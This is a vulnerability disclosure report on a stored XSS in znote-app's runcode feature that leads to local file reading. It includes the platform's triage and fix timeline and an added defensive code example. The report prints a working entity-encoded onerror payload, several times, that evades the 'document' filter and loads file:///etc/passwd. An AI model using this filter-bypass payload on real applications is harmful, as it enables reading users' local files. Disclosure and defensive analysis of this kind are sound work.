XSS to LFI in Runcode Feature in alagrede/znote-app

Valid

Reported on

Nov 28th 2022


Description

By default, runcode sanitizes the "document" prefix, but if the call is HTML-entity encoded as &#0000100&#0000111&#000099&#0000117&#0000109&#0000101&#0000110&#0000116&#000046&#0000119&#0000114&#0000105&#0000116&#0000101&#000040&#000039&#000060&#0000105&#0000102&#0000114&#000097&#0000109&#0000101&#000032&#0000115&#0000114&#000099&#000061&#0000102&#0000105&#0000108&#0000101&#000058&#000047&#000047&#000047&#0000101&#0000116&#000099&#000047&#0000112&#000097&#0000115&#0000115&#0000119&#0000100&#000062&#000060&#000047&#0000105&#0000102&#0000114&#000097&#0000109&#0000101&#000062&#000039&#000041 (which the browser decodes to document.write('<iframe src=file:///etc/passwd></iframe>')), the filter does not match it. The encoded call can then be placed in an HTML tag event handler such as onerror: <img src=x onerror="&#0000100&#0000111&#000099&#0000117&#0000109&#0000101&#0000110&#0000116&#000046&#0000119&#0000114&#0000105&#0000116&#0000101&#000040&#000039&#000060&#0000105&#0000102&#0000114&#000097&#0000109&#0000101&#000032&#0000115&#0000114&#000099&#000061&#0000102&#0000105&#0000108&#0000101&#000058&#000047&#000047&#000047&#0000101&#0000116&#000099&#000047&#0000112&#000097&#0000115&#0000115&#0000119&#0000100&#000062&#000060&#000047&#0000105&#0000102&#0000114&#000097&#0000109&#0000101&#000062&#000039&#000041">

POC: https://drive.google.com/file/d/1_Jh133kMAqMf8AUWrrjbOqRQpHSKlVyO/view?usp=sharing https://drive.google.com/file/d/1ek5dg4PG3rADuUPPXUOlKE6qSVGmKdZB/view?usp=sharing

Proof of Concept

<img src=x onerror="&#0000100&#0000111&#000099&#0000117&#0000109&#0000101&#0000110&#0000116&#000046&#0000119&#0000114&#0000105&#0000116&#0000101&#000040&#000039&#000060&#0000105&#0000102&#0000114&#000097&#0000109&#0000101&#000032&#0000115&#0000114&#000099&#000061&#0000102&#0000105&#0000108&#0000101&#000058&#000047&#000047&#000047&#0000101&#0000116&#000099&#000047&#0000112&#000097&#0000115&#0000115&#0000119&#0000100&#000062&#000060&#000047&#0000105&#0000102&#0000114&#000097&#0000109&#0000101&#000062&#000039&#000041">

Github issue: https://github.com/alagrede/znote-app/issues/73
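The bypass above works because a prefix check on the raw markup never sees the decoded attribute value that the browser executes. The following is an added example (not znote-app's code) that contrasts such a naive filter with a check that decodes character references first and refuses inline event handlers and file:/javascript: URLs outright; the sanitiser shape, the helper names and the padded-decimal encoder are assumptions modelled on the report.

```javascript
// Added example, not znote-app's code: a prefix blocklist on raw markup
// versus a check that first normalises the text the way a browser would.

// Decode numeric (decimal/hex, semicolon optional) and common named
// character references, as a browser does when reading an attribute value.
function decodeEntities(s) {
  const named = { amp: "&", lt: "<", gt: ">", quot: '"', apos: "'" };
  return s.replace(/&(#x[0-9a-f]+|#\d+|[a-z]+);?/gi, (m, body) => {
    if (body[0] === "#") {
      const cp = body[1].toLowerCase() === "x"
        ? parseInt(body.slice(2), 16)
        : parseInt(body.slice(1), 10);
      return cp <= 0x10ffff ? String.fromCodePoint(cp) : m;
    }
    return named[body.toLowerCase()] ?? m;
  });
}

// Encode every character as a zero-padded decimal reference without a
// semicolon, the form the report uses (helper for the sample below).
function encodeDecimal(s) {
  return [...s].map(c => "&#" + String(c.codePointAt(0)).padStart(7, "0")).join("");
}

// Naive filter modelled on the sanitiser the report describes: it looks
// for a literal "document." in the raw markup and never decodes entities.
function naiveAllows(markup) {
  return !/document\./i.test(markup);
}

// Hardened check: decode first so the test sees what the browser will run,
// then refuse inline event handlers and file:/javascript: URLs outright
// instead of keyword-matching the script inside them.
function hardenedAllows(markup) {
  const decoded = decodeEntities(markup);
  if (/\son[a-z]+\s*=/i.test(decoded)) return false;          // onerror=, onload=, ...
  if (/javascript\s*:|file\s*:\/\//i.test(decoded)) return false; // dangerous URL schemes
  return !/document\./i.test(decoded);
}

// Constructed sample: the report's payload, rebuilt from its decoded form.
const REPORT_PAYLOAD = '<img src=x onerror="' +
  encodeDecimal("document.write('<iframe src=file:///etc/passwd></iframe>')") + '">';

console.log("naive allows:", naiveAllows(REPORT_PAYLOAD));       // true  (bypassed)
console.log("hardened allows:", hardenedAllows(REPORT_PAYLOAD)); // false (blocked)
```

Keyword blocklists remain brittle even after decoding; an allowlist-based HTML sanitiser that drops every event-handler attribute and restricts URL schemes is the dependable fix, and rendering user content without access to file:// URLs removes the LFI impact entirely.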

Impact

Read local OS files via stored XSS

We are processing your report and will contact the alagrede/znote-app team within 24 hours. a month ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md a month ago
reza.duty
a month ago

Researcher


any update?

Pavlos modified the Severity from High (8.6) to Low (2.3) a month ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Pavlos validated this vulnerability a month ago
reza.duty has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Pavlos marked this as fixed in 1.7.11 with commit d88933 a month ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
Pavlos published this vulnerability a month ago
reza.duty
a month ago

Researcher


Can you please request a CVE?
